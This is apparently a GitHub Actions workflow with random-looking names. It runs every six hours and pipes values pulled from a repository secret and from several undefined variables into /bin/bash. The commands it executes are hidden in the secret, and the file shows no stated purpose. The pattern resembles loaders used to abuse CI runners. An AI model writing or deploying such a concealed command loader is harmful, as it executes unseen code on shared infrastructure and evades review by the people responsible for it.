name: ningtiandeng4718

on:
  workflow_dispatch:
  schedule:
    - cron: '3 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: ningtiandeng4718
        env:
          l7721: ${{ secrets.l7721 }}
        run: |
          echo $l7721 | jq -r .bl52 | /bin/bash
          echo $ykrzz45 | jq -r .ftv106 | /bin/bash
          echo $ehbq21 | jq -r .zoo5 | /bin/bash
          echo $sw5 | jq -r .ezrsd2 | /bin/bash

